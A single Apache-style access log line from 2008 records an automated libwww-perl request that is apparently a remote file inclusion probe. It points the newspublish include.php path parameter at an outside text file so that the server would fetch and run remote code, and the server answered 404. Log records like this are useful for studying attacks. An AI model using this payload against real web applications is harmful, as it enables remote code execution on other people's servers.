85.214.24.238 - - [10/Aug/2008:13:09:14 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
